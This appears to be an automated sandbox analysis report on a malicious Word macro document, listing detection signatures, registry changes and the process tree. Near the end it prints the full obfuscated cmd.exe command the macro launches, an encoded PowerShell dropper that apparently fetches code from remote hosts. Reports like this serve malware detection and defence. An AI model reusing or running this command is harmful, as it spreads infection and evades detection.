Analysis Overview
SHA256
c57bc62f944a858d7b6b1e2ff89f50f466b260cf79385517cc9c108d9b244530
Threat Level: Known bad
The file 75b5887bf105e8c270a980a1122802d3_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Suspicious Office macro
Blocklisted process makes network request
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 14:00
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 14:00
Reported
2024-05-26 14:06
Platform
win7-20240508-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\CMD.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\CMD.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\75b5887bf105e8c270a980a1122802d3_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\CMD.exe
CMD /v^ /R" ^S^E^t ^ ^ ^B^W^k^q==^A^AI^A^ACAg^AAIAAC^A^gAA^I^A^AC^A^g^AA^I^A^ACA^g^A^A^IAAC^Ag^AA^IAACA9^BQf^A^s^H^A^oBw^Y^A^QHAh^B^wY^A0HA^7^Aw^aAEGAlBgcA^IGA^7^A^QVAY^E^A^qB^A^JA^AC^AtB^Q^ZA^Q^HA^J^BQLAU^GArB^w^bAY^HA^u^BQSA^sDApAQVAY^EA^qB^A^JAACA^sA^A^a^A^8E^A3^B^A^JA^gCAlBAbAk^G^AGBAZA^EGAvBAbA4G^A^3^B^w^b^AQEA^uA^g^W^A^Y^E^Ay^BA^JAsHA^5^BgcAQHA7BQKAY^E^A^tB^gUA^QC^A^gAgb^Ak^G^A^g^AA^aA8^E^A^3BA^JA^gCA^oB^wYAEG^AlB^gc^A8G^A^mBw^O^AcCAl^BAe^AUG^Au^A^wJA^sC^A^3^B^wQ^A^kG^A^k^A^w^K^AcCAc^B^wJ^AsC^AjBQ^aAw^G^Ai^BQd^A^A^HA6^Ag^d^A^4^GAl^B^AJA0D^AV^B^gR^A^o^GA^kA^w^O^AcC^Aw^AA^OA^Y^DAn^A^A^IA^0^D^AgAwdA^ME^A^pB^A^JAs^DApAw^J^AAE^AnA^A^K^AQ^HA^p^BAb^A^A^HA^TBgLAcC^A^q^B^Q^OAgG^AQBw^L^A^U^H^AyB^gL^A^kGArBQ^YAI^GA^t^A^w^b^AQ^HA^2B^Q^Y^A^8CAv^AgO^AAH^A^0B^A^d^AgGA^AB^gVA^E^DAwA^w^T^AgEAaBQc^A^MGAv^AQ^b^A^8GAj^B^g^LAE^G^AmBgZ^Ag^G^AnB^Q^aA^g^GAlBAbAkG^At^B^w^L^A^8CA^6^A^Ac^AQHA^0B^Aa^AAE^AxAwcAc^D^AR^BwLA0GAv^BwY^A4CA6^BQd^AwG^A^h^B^AbAUGAk^Bgc^AQ^GAv^A^w^L^AoD^Aw^B^AdA^Q^H^A^o^BAQAgD^AvAQbA^8G^A^jB^gLA^sG^Ap^B^A^bAMHAh^Bwa^AQ^GA^pB^gcAcGA^uB^Q^a^A^8C^AvAgO^A^A^HA0BA^d^A^g^GAAB^gNAUE^AC^Bg^a^A^8CA^zBQ^dA^4C^AzBwc^AUG^Au^BQ^a^AMHA1BgYA4GA^hB^wZA^k^G^AoBwYAk^G^A^tBwL^A^8C^A^6^AAcA^QHA^0BAaAcCA^9^AgRA^0GA^SBAJ^AsD^A0Bg^b^A^UG^A^pBA^b^AM^E^AiBQZ^AcF^AuA^AdAUG^A^O^B^A^IAQH^A^jB^Q^ZAoGA^iBw^bA^0C^A^3^BQ^ZA4G^A9A^g^WAY^EAy^BA^J ^e-^ l^l^eh^srewo^p&& f^oR /^l %^e ^in ( ^921 ^-1^ ^0) ^dO s^e^t C^H=!C^H!!^B^W^k^q:~ %^e,1!&& ^I^F %^e =^=^0 C^a^LL %C^H:^~ ^ ^4% "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
